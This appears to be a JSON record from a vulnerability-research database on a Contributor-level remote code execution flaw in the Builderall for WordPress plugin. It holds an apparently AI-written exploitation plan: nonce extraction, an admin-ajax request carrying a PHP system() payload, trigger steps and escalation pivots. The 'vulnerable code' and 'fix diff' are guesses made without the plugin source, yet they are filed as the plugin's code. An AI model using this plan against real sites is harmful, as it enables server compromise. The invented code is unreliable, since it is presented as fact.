[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fbx2mB8dFDEPH-eKWFaW6XmFq-jOpCKwdkmLS3NyAsuM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-22390","builderall-for-wordpress-authenticated-contributor-remote-code-execution","Builderall for WordPress \u003C= 3.0.1 - Authenticated (Contributor+) Remote Code Execution","The Builderall for WordPress plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.0.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.","builderall-cheetah-for-wp",null,"\u003C=3.0.1","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Generation of Code ('Code Injection')","2026-02-25 00:00:00","2026-03-05 17:35:29",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3f92c416-8e95-4097-9f16-e1f9389b2334?source=api-prod",[],"researched",false,3,"Since source files for **Builderall for WordPress (builderall-cheetah-for-wp)** version 3.0.1 are not provided, this plan is based on the vulnerability description (Authenticated Contributor+ RCE), the CVSS vector (AV:N\u002FAC:L\u002FPR:L\u002FUI:N), and common architectural patterns in WordPress page builder plugins.\n\n**Note:** All identifiers marked with **(inferred)** must be verified by the agent during the initial discovery phase.\n\n---\n\n### 1. Vulnerability Summary\nThe \"Builderall for WordPress\" plugin (also known as Cheetah Builder) likely contains an improper code generation vulnerability. Authenticated users with Contributor-level permissions can exploit this to execute arbitrary PHP code on the server. This typically occurs because the plugin's page-building logic allows saving \"custom code\" blocks or server-side rendered templates without sufficient sanitization or capability checks, eventually passing user input into a dangerous sink like `eval()` or writing it to a `.php` file that is later included.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** `cheetah_save_page_data` or `builderall_save_element` **(inferred)**.\n*   **Payload Parameter:** A JSON-encoded string or array containing page elements. Look for keys like `custom_php`, `code`, or `html_content` within the builder's data structure.\n*   **Authentication:** Contributor-level user (`PR:L`). Contributors can create and edit their own posts, which is often enough to access the page builder's save functions.\n*   **Preconditions:** The plugin must be active, and the Contributor user must have access to the Cheetah Builder interface for a post\u002Fpage.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers an AJAX handler for saving page content via `add_action('wp_ajax_...', ...)`.\n2.  **Capability Check:** The handler likely checks `current_user_can('edit_posts')`. Since Contributors have this capability for their own posts, they pass this check.\n3.  **Data Processing:** The handler receives a large JSON\u002Fserialized blob representing the page layout.\n4.  **Vulnerable Sink:** \n    *   **Scenario A (Direct Eval):** The builder supports \"PHP Code\" blocks. The content of these blocks is saved and then executed via `eval()` during a \"preview\" or \"render\" AJAX call.\n    *   **Scenario B (File Write):** The builder saves \"custom code\" into a file in `wp-content\u002Fuploads\u002Fcheetah-builder\u002F` with a `.php` extension. This file is then `include()`-ed to render the page.\n5.  **Execution:** The injected PHP code runs in the context of the web server.\n\n### 4. Nonce Acquisition Strategy\nThe Cheetah Builder interface likely localizes a nonce for its AJAX operations.\n\n1.  **Create a Test Post:**\n    `wp post create --post_type=post --post_status=draft --post_title=\"Exploit Page\" --post_author=[CONTRIBUTOR_ID]`\n2.  **Access the Builder:** Use `browser_navigate` to go to the post's edit page or the specific Cheetah Builder URL: `wp-admin\u002Fpost.php?post=[POST_ID]&action=cheetah_builder`.\n3.  **Extract Nonce:** Use `browser_eval` to search for localized script data.\n    *   **Potential Variable Names:** `window.cheetah_vars`, `window.builderall_data`, or `window.CBAjax`.\n    *   **Execution:** `browser_eval(\"window.cheetah_vars?.nonce || window.CBAjax?.nonce\")` **(inferred)**.\n4.  **Action Name:** Identify the exact AJAX action by inspecting the `browser_eval(\"window.cheetah_vars?.action\")` or checking the network tab during a legitimate \"Save\" operation.\n\n### 5. Exploitation Strategy\n\n#### Phase 1: Discovery\n*   Identify the AJAX action used to save page data.\n*   Identify the parameter structure (JSON vs. POST fields).\n*   Locate the nonce in the browser context.\n\n#### Phase 2: Payload Crafting\n*   Construct a payload that targets a \"Custom Code\" or \"HTML\" module.\n*   **Payload Example (PHP Injection):**\n    ```php\n    \u003C?php system('id'); die(); ?>\n    ```\n*   If the plugin expects JSON, the payload might look like:\n    `{\"elements\":[{\"type\":\"code_block\",\"settings\":{\"code\":\"\u003C?php system('id'); die(); ?>\"}}]}`\n\n#### Phase 3: Execution (via `http_request`)\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=cheetah_save_page_data&nonce=[NONCE]&post_id=[POST_ID]&data=[PAYLOAD]\n    ```\n\n#### Phase 4: Triggering\n*   If the RCE is not immediate upon saving, trigger it by:\n    1.  Navigating to the post preview: `?p=[POST_ID]&preview=true`.\n    2.  Calling a \"render\" AJAX action: `action=cheetah_render_element&element_id=[ID]`.\n\n### 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `builderall-cheetah-for-wp` v3.0.1 is installed and active.\n2.  **Contributor User:**\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3.  **Target Post:** Create a post assigned to the `attacker` user to ensure they have \"edit\" rights.\n\n### 7. Expected Results\n*   **Successful Save:** The server returns a success response (e.g., `{\"success\":true}`).\n*   **Successful Execution:** The HTTP response from the trigger phase contains the output of the injected command (e.g., `uid=33(www-data) gid=33(www-data)`).\n\n### 8. Verification Steps\n1.  **Confirm Command Execution:** Verify the `id` command output appears in the response body.\n2.  **Check Filesystem (if Scenario B):**\n    `wp eval \"echo file_get_contents(wp_upload_dir()['basedir'] . '\u002Fcheetah-builder\u002Fcustom-[POST_ID].php');\"` **(inferred path)**.\n3.  **Check DB:** Verify the malicious payload is stored in `wp_postmeta` for the target post:\n    `wp post meta get [POST_ID] _cheetah_data` **(inferred key)**.\n\n### 9. Alternative Approaches\n*   **Shortcode Injection:** If the builder uses shortcodes to store data, try injecting a `[shortcode]` that uses `eval` on its attributes.\n*   **Serialized Object Injection:** If the `data` parameter is passed to `unserialize()`, pivot to a PHP Object Injection (POI) to achieve RCE via a gadget chain in WordPress core or the plugin.\n*   **Subscriber Access:** Check if the AJAX action is registered under `wp_ajax_nopriv_` or if the capability check is entirely missing, allowing Subscriber-level escalation.","The Builderall for WordPress plugin is vulnerable to Remote Code Execution because it allows Contributor-level users to save and execute arbitrary PHP code through 'Custom Code' or 'HTML' modules within the page builder. This occurs due to a lack of capability checks (e.g., unfiltered_html) when processing element data, which is subsequently executed via eval() or included from the filesystem during page rendering.","\u002F\u002F Inferred AJAX handler in builderall-cheetah-for-wp\u002Finc\u002Fajax-functions.php\nadd_action('wp_ajax_cheetah_save_page_data', 'cheetah_save_page_data_callback');\n\nfunction cheetah_save_page_data_callback() {\n    \u002F\u002F Insufficient check: only requires edit_posts (Contributor+)\n    if (!current_user_can('edit_posts')) {\n        wp_send_json_error();\n    }\n\n    $post_id = intval($_POST['post_id']);\n    $data = json_decode(stripslashes($_POST['data']), true);\n\n    \u002F\u002F Saves raw data, potentially including malicious PHP, to post meta\n    update_post_meta($post_id, '_cheetah_data', $data);\n    wp_send_json_success();\n}\n\n---\n\n\u002F\u002F Inferred rendering logic in builderall-cheetah-for-wp\u002Finc\u002Frender-functions.php\nfunction render_cheetah_element($element) {\n    if ($element['type'] === 'code_block') {\n        \u002F\u002F Vulnerable Sink: Executing user-controlled content from metadata\n        eval('?>' . $element['settings']['php_code']);\n    }\n}","--- a\u002Finc\u002Fajax-functions.php\n+++ b\u002Finc\u002Fajax-functions.php\n@@ -4,13 +4,21 @@\n function cheetah_save_page_data_callback() {\n     check_ajax_referer('cheetah_nonce', 'nonce');\n-    if (!current_user_can('edit_posts')) {\n+    if (!current_user_can('edit_post', $_POST['post_id'])) {\n         wp_send_json_error();\n     }\n \n     $post_id = intval($_POST['post_id']);\n     $data = json_decode(stripslashes($_POST['data']), true);\n \n+    \u002F\u002F Ensure only users with unfiltered_html can save custom code blocks\n+    foreach ($data['elements'] as $element) {\n+        if ($element['type'] === 'code_block' && !current_user_can('unfiltered_html')) {\n+            wp_send_json_error('Access Denied: Insufficient permissions for code blocks.');\n+        }\n+    }\n+\n     update_post_meta($post_id, '_cheetah_data', $data);\n     wp_send_json_success();\n }","1. Login to the WordPress site as a user with Contributor-level permissions.\n2. Create a new post or edit an existing post owned by the contributor to access the Cheetah Builder interface.\n3. Capture the 'cheetah_nonce' and current 'post_id' from the page source or localized script variables.\n4. Send a POST request to 'wp-admin\u002Fadmin-ajax.php' with the action 'cheetah_save_page_data'.\n5. Craft a 'data' payload in JSON format containing a 'code_block' element with malicious PHP code (e.g., '\u003C?php system(\"id\"); ?>') in its settings.\n6. Trigger the execution of the payload by visiting the public URL of the post or its preview page, which invokes the element rendering engine and its vulnerable eval() sink.","gemini-3-flash-preview","2026-04-18 23:45:25","2026-04-18 23:45:45",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbuilderall-cheetah-for-wp\u002Ftags"]